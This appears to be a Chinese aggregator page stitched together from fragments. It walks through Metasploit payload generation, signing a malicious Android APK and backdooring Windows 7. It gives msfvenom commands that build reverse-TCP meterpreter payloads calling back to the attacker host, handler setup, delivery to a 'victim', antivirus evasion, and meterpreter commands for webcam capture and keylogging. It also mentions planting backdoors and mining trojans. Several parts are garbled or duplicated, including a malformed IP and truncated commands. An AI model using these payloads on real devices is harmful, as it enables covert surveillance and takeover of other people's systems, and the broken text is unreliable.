渗透工具msf安装,msf后渗透模块

导航：

• 1、如何使用metasploit对安卓手机进行控制
• 2、如何在ubuntu中安装metasploit环境
• 3、用termux安装metasploit的问题，挺急的，求大神解决，在线等！！
• 4、msf能渗透外网服务器么
• 5、看黑客怎么使用Metasploit进行渗透windows7的
• 6、一个完整的渗透测试流程，分为那几块，每一块有哪些内容

如何使用metasploit对安卓手机进行控制

在这次的实验中，我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机：Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端，使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令，使用msfvenom工具来创建有效载荷APK文件。

```

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk

```

p 设置要使用的payload

LHOST 设置用来接收反弹连接的主机

LPORT 设置用来接收反弹连接的端口

R 设置文件格式

Location 要保存的文件位置

这个命令执行完之后，你会看到一些错误，但不用担心。现在可以到输出目录查看生成的apk了。

我们已经成功创建了Android格式（APK）文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名：

l Keytool (已安装)

l jar signer (已安装)

l zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

`

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAME.apk

`

Kali没有预装Zipalign，需要先apt-get install zipalign。然后用zipalign来验证apk。

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

现在我们有了一个带有签名的APK，它可以安装在任何设备上。

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handler

Set PAYLOAD android/meterpreter/reverse_tcp

SET LHOST 192.168.152.128

SET LPORT 4444

Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK，并将下载链接分享出去。

1、从下载android x86的iso。

2、使用vmware创建一个内核版本为2.6的虚拟机。

3、挂载镜像，启动虚拟机。

4、进入Live模式。

5、设置手机并登陆谷歌帐号。

在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。

另外要允许安卓安装来历不明的apk。

切换回Kali，我们发现创建了一个新的会话。

然后你就可以为所欲为的操作这台“手机”了。

如何在ubuntu中安装metasploit环境

安装metasploit

1、curl msfinstall

2、chmod 755 msfinstall

3、./msfinstall

依次执行上面的三条命令即可安装成功

2

安装postgresql数据库

安装数据库的时候会自动创建系统用户postgres,数据库用户postgres,数据库postgres

1、apt-get install postgresql //安装postgresql数据库

2、su - postgres //切换到postgres用户

3、psql //登陆postgresql数据库，首次登陆没有密码

4、\password postgres //修改数据库用户postgres的密码

3

msf使用数据库

1、msfconsole //启动msf

2、db_connect postgres:hehehe@127.0.0.1/test //用户名，密码，地址，自己随意编造的名字。

3、db_status //查看数据库连接状态

4

安装完成，可以开始你的metasploit渗透之路了！！！

5

参考：如果希望添加新的用户

建立一个普通用户

useradd -m feng //feng是我的用户名，你可以改成任意用户名。

passwd feng //设置一下新建的用户名的密码。

usermod -a -G sudo feng //修改用户的附加组为超级管理组。

chsh -s /bin/bash feng //设置用户使用的命令控制台。

6

sure : if you want to download it from "http" with thunder and so on , please open

then move to the bottom , get it !!

用termux安装metasploit的问题，挺急的，求大神解决，在线等！！

初次使用简书，不知道可以编辑md文档，所以排版有点.....

termux可以利用proot出一个linux，proot是无需root的。但是随之而来很多问题

1.kali大部分工具不知道如何安装比如msf，以为apt install metasploit就行了

2.不会使用pkg，termux中pkg和apt其实差不多.........

3.没有图形化界面

本文就是希望更多人可以使用termux，发展termux。以下是正文(错误难免，还望指出)

好多人一直苦于安装msf，rsf，python的numpy，matplotlib，pillow(这个库我已经安装成功了)等库。还有就是终端不够漂亮。这篇文章就是……如题*^o^*手动滑稽

如果没有下载termux，这是官网地址点这里

推荐去f-droid下载最新版(酷安的一直没有更新)

ps.第一次进最好使用流量

另外我在github上面有关于termux的一个项目漂亮的妹子看过来欢迎fork and star。

ps.这个项目是帮助你们安装所有我安装了的东西，如果不喜欢，可以看下文，下文也包含了那些东西，只不过我那个脚本是自动化的。

msf能渗透外网服务器么

很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣，针对这些以下业内相关专家就给大家介绍下，当下黑客怎么利用Metasploit进行渗透windows7的。

设定目标主机为：cn_win7_x86_7601虚拟机，地址为：192.168.0.116；而本地主机就为：192.168.0.149。

方法步骤一：黑客用Msfpayload直接生成相关的后门程序，如下图。

sfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x steup.exe

方法步骤二：黑客直接就能进入所在的目录并将属性进行修改，换为允许以程序执行文件，详细如下图。

进入所在目录，修改属性：选择“允许以程序执行文件”,这时候也可以做一些免杀

方法步骤三：接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机，最后就能开始进行监听了，详细情况如下图。

打开msfconsole，加载exploit/multi/handler模块，设置本地主机；然后开始监听：exploit -z -j ：

方法步骤四：黑客需要能将程序直接拷贝都目标主机中并进行执行。

看黑客怎么使用Metasploit进行渗透windows7的

很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣，针对这些以下业内相关专家就给大家介绍下，当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为：cn_win7_x86_7601虚拟机，地址为：192.168.0.116；而本地主机就为：192.168.0.149。方法步骤一：黑客用Msfpayload直接生成相关的后门程序，如下图。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149xsteup.exe方法步骤二：黑客直接就能进入所在的目录并将属性进行修改，换为允许以程序执行文件，详细如下图。进入所在目录，修改属性：选择“允许以程序执行文件”,这时候也可以做一些免杀方法步骤三：接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机，最后就能开始进行监听了，详细情况如下图。打开msfconsole，加载exploit/multi/handler模块，设置本地主机；然后开始监听：exploit-z-j：方法步骤四：黑客需要能将程序直接拷贝都目标主机中并进行执行。方法步骤五：以上步骤全部完成后黑客就能通过后门程序反向连接到msf，用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf，详细的如下图。Meterpreter就是metasploit框架中的一个扩展模块，因此的话溢出成功后黑客就能攻击载荷进行使用，一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道，这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。另外，附meterpreter常用命令：getsystem#会自动利用各种各样的系统漏洞来进行权限提升migrate#进程id进程迁移background#把当前的会话设置为背景，需要的时候在启用getuid#查看对方正在运行的用户ps#列出所有的进程getpid#返回运行meterpreter的id号sysinfo#产看系统信息和体系结构shell#切换到cmd的系统权限方式exit#退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口runwebcam-p/var/www#在/var/www目录监控目标主机的摄像头keylog_recorder#使用migrate将会话迁移至explorer.exe的进程空间后记录键盘

一个完整的渗透测试流程，分为那几块，每一块有哪些内容

包含以下几个流程：

信息收集

第一步做的就是信息收集，根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。

漏洞探测

当我们收集到了足够多的信息之后，我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞，比如：SQL注入 。

漏洞利用

探测到了该网站存在漏洞之后，就要对该漏洞进行利用了。不同的漏洞有不同的利用工具，很多时候，通过一个漏洞我们很难拿到网站的webshell，我们往往需要结合几个漏洞来拿webshell。

内网渗透

当我们能跟内网主机进行通信后，我们就要开始进行内网渗透了。可以先使用nmap对内网主机进行扫描，探测在线的主机，并且探测其使用的操作系统、开放的端口等信息。

内网中也有可能存在供内网使用的内网服务器，可以进一步渗透拿下其权限。

痕迹清除

达到了目的之后，有时候只是为了黑入网站挂黑页，炫耀一下；或者在网站留下一个后门，作为肉鸡，没事的时候上去溜达溜达；亦或者挂入挖矿木马。

撰写渗透测试保告

在完成了渗透测试之后，就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞，以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险，防止被黑客攻击。